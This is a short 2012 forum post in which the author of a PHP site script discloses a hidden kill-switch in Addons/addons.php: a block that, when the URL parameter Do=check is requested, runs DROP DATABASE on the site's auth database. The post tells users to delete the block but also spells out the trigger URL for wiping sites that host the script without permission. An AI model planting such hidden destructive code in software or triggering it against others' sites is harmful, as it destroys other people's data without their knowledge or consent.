06-25-2012, 12:19 AM
Open Addons/addons.php
Goto line 74 and find code:
// Settings Checker
if( isset( $_GET[Do] ) && $_GET[Do] == check )
{
include ../Site_Settings/Configuration.php;
mysql_query("DROP DATABASE ". $SiteSQL["config-database_auth"] ." ");
}
DELETE it

Guide to wipe auth table if someone is using my site without my auth
If you do 2 then add Addons/addons.php?Do=check
it will wipe the auth table.
I suggest if you using this site you fix it fast xD I noticed device-club n00bs hosting my site for download so people getting it still after I removed the download link from this forum.
I do not support people using this an if your auth table gets wiped now you know why.
Goodluck - 2

